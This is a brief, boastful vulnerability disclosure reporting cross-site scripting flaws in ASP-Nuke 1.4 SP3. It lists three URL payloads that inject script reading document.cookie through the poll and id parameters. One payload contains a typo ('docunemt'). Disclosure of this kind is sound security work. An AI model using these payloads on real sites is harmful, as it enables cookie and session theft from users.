ASP-Nuke community version 1.4 SP3 suffers from multiple cross site scripting flaws. Earlier versions also may be affected.
0e5f2db41beda4c6ddfb3e9d198570e36732152bc573d3031da6c77aa43fc95b
I MurderSkillz from g00ns.net have found xss vulnerabilities in ASP-Nuke community v1.4 SP3 (and possibly other versions).
Shouts go to all the g00ns. Once again..g00ns.net fucking owns j00!
Found in
XSS
/aspnuke/default.asp?poll='><script>alert(document.cookie);</script>&results=1
----------
/aspnuke/signup.asp?poll='><script>alert(docunemt.cookie);</script>&results=1
----------
/aspnuke/news.asp?id='><script>alert(document.cookie);</script>